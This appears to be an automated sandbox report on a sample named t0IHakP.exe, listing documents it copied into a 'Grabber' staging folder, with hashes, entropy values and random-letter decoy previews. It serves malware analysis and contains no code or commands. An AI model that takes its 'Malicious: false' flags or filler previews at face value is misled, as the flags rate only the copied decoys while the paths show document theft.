VUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\TQDGENUHWP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDSOXXXWOA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDSOXXXWOA\IVHSHTCODI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
